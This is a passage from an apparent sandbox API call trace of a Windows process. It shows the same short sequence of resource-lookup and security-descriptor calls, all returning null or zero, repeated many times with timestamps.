pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.977] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.977] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.977] LockResource (hResData=0x0) returned 0x0 [0069.977] FreeResource (hResData=0x0) returned 0 [0069.977] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.977] LockResource (hResData=0x0) returned 0x0 [0069.977] FreeResource (hResData=0x0) returned 0 [0069.977] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.977] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.977] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.977] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.977] LockResource (hResData=0x0) returned 0x0 [0069.977] FreeResource (hResData=0x0) returned 0 [0069.977] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.977] LockResource (hResData=0x0) returned 0x0 [0069.977] FreeResource (hResData=0x0) returned 0 [0069.977] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.978] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.978] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.978] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.978] LockResource (hResData=0x0) returned 0x0 [0069.978] FreeResource (hResData=0x0) returned 0 [0069.978] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.978] LockResource (hResData=0x0) returned 0x0 [0069.978] FreeResource (hResData=0x0) returned 0 [0069.978] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.978] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.978] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.978] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.978] LockResource (hResData=0x0) returned 0x0 [0069.978] FreeResource (hResData=0x0) returned 0 [0069.978] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.978] LockResource (hResData=0x0) returned 0x0 [0069.978] FreeResource (hResData=0x0) returned 0 [0069.978] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.978] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.978] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.978] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.978] LockResource (hResData=0x0) returned 0x0 [0069.978] FreeResource (hResData=0x0) returned 0 [0069.978] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.978] LockResource (hResData=0x0) returned 0x0 [0069.978] FreeResource (hResData=0x0) returned 0 [0069.978] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.978] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.978] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.978] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.979] LockResource (hResData=0x0) returned 0x0 [0069.979] FreeResource (hResData=0x0) returned 0 [0069.979] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.979] LockResource (hResData=0x0) returned 0x0 [0069.979] FreeResource (hResData=0x0) returned 0 [0069.979] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.979] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.979] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.979] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.979] LockResource (hResData=0x0) returned 0x0 [0069.979] FreeResource (hResData=0x0) returned 0 [0069.979] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.979] LockResource (hResData=0x0) returned 0x0 [0069.979] FreeResource (hResData=0x0) returned 0 [0069.979] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.979] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.979] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.979] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.979] LockResource (hResData=0x0) returned 0x0 [0069.979] FreeResource (hResData=0x0) returned 0 [0069.979] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.979] LockResource (hResData=0x0) returned 0x0 [0069.979] FreeResource (hResData=0x0) returned 0 [0069.979] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.979] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.979] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.979] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.979] LockResource (hResData=0x0) returned 0x0 [0069.979] FreeResource (hResData=0x0) returned 0 [0069.980] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.980] LockResource (hResData=0x0) returned 0x0 [0069.980] FreeResource (hResData=0x0) returned 0 [0069.980] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.980] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.980] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.980] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.980] LockResource (hResData=0x0) returned 0x0 [0069.981] FreeResource (hResData=0x0) returned 0 [0069.981] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.981] LockResource (hResData=0x0) returned 0x0 [0069.981] FreeResource (hResData=0x0) returned 0 [0069.981] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.981] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.981] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.981] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.981] LockResource (hResData=0x0) returned 0x0 [0069.981] FreeResource (hResData=0x0) returned 0 [0069.981] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.981] LockResource (hResData=0x0) returned 0x0 [0069.981] FreeResource (hResData=0x0) returned 0 [0069.981] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.981] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.981] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.981] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.981] LockResource (hResData=0x0) returned 0x0 [0069.981] FreeResource (hResData=0x0) returned 0 [0069.981] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.981] LockResource (hResData=0x0) returned 0x0 [0069.981] FreeResource (hResData=0x0) returned 0 [0069.981] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.981] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.981] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.981] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.981] LockResource (hResData=0x0) returned 0x0 [0069.981] FreeResource (hResData=0x0) returned 0 [0069.981] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.982] LockResource (hResData=0x0) returned 0x0 [0069.982] FreeResource (hResData=0x0) returned 0 [0069.982] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.982] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.982] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.982] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.982] LockResource (hResData=0x0) returned 0x0 [0069.982] FreeResource (hResData=0x0) returned 0 [0069.982] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.982] LockResource (hResData=0x0) returned 0x0 [0069.982] FreeResource (hResData=0x0) returned 0 [0069.982] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.982] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.982] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.982] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.982] LockResource (hResData=0x0) returned 0x0 [0069.982] FreeResource (hResData=0x0) returned 0 [0069.982] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.982] LockResource (hResData=0x0) returned 0x0 [0069.982] FreeResource (hResData=0x0) returned 0 [0069.982] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.982] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.982] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.982] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.982] LockResource (hResData=0x0) returned 0x0 [0069.982] FreeResource (hResData=0x0) returned 0 [0069.982] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.982] LockResource (hResData=0x0) returned 0x0 [0069.982] FreeResource (hResData=0x0) returned 0 [0069.982] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.982] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.983] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.983] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.983] LockResource (hResData=0x0) returned 0x0 [0069.983] FreeResource (hResData=0x0) returned 0 [0069.983] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.983] LockResource (hResData=0x0) returned 0x0 [0069.983] FreeResource (hResData=0x0) returned 0 [0069.983] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.983] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.983] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.983] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.983] LockResource (hResData=0x0) returned 0x0 [0069.983] FreeResource (hResData=0x0) returned 0 [0069.983] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.983] LockResource (hResData=0x0) returned 0x0 [0069.983] FreeResource (hResData=0x0) returned 0 [0069.983] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.983] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.983] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.983] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.983] LockResource (hResData=0x0) returned 0x0 [0069.983] FreeResource (hResData=0x0) returned 0 [0069.983] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.983] LockResource (hResData=0x0) returned 0x0 [0069.984] FreeResource (hResData=0x0) returned 0 [0069.984] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.984] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.984] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.984] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.984] LockResource (hResData=0x0) returned 0x0 [0069.984] FreeResource (hResData=0x0) returned 0 [0069.984] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.984] LockResource (hResData=0x0) returned 0x0 [0069.984] FreeResource (hResData=0x0) returned 0 [0069.984] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.984] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.984] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.984] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.984] LockResource (hResData=0x0) returned 0x0 [0069.984] FreeResource (hResData=0x0) returned 0 [0069.984] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.984] LockResource (hResData=0x0) returned 0x0 [0069.984] FreeResource (hResData=0x0) returned 0 [0069.984] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.984] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.984] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.984] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.984] LockResource (hResData=0x0) returned 0x0 [0069.984] FreeResource (hResData=0x0) returned 0 [0069.984] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.984] LockResource (hResData=0x0) returned 0x0 [0069.984] FreeResource (hResData=0x0) returned 0 [0069.984] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.984] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.984] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.984] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.984] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.985] LockResource (hResData=0x0) returned 0x0 [0069.985] FreeResource (hResData=0x0) returned 0 [0069.985] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.985] LockResource (hResData=0x0) returned 0x0 [0069.985] FreeResource (hResData=0x0) returned 0 [0069.985] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.985] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.985] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.985] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.985] LockResource (hResData=0x0) returned 0x0 [0069.985] FreeResource (hResData=0x0) returned 0 [0069.985] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.985] LockResource (hResData=0x0) returned 0x0 [0069.985] FreeResource (hResData=0x0) returned 0 [0069.985] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.985] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.985] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.985] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.985] LockResource (hResData=0x0) returned 0x0 [0069.985] FreeResource (hResData=0x0) returned 0 [0069.985] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.985] LockResource (hResData=0x0) returned 0x0 [0069.985] FreeResource (hResData=0x0) returned 0 [0069.985] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.985] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.985] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.985] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.985] LockResource (hResData=0x0) returned 0x0 [0069.985] FreeResource (hResData=0x0) returned 0 [0069.985] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.985] LockResource (hResData=0x0) returned 0x0 [0069.985] FreeResource (hResData=0x0) returned 0 [0069.985] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.985] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.985] IsNLSDefinedString (Function=0x0, dwFlags=0x0, 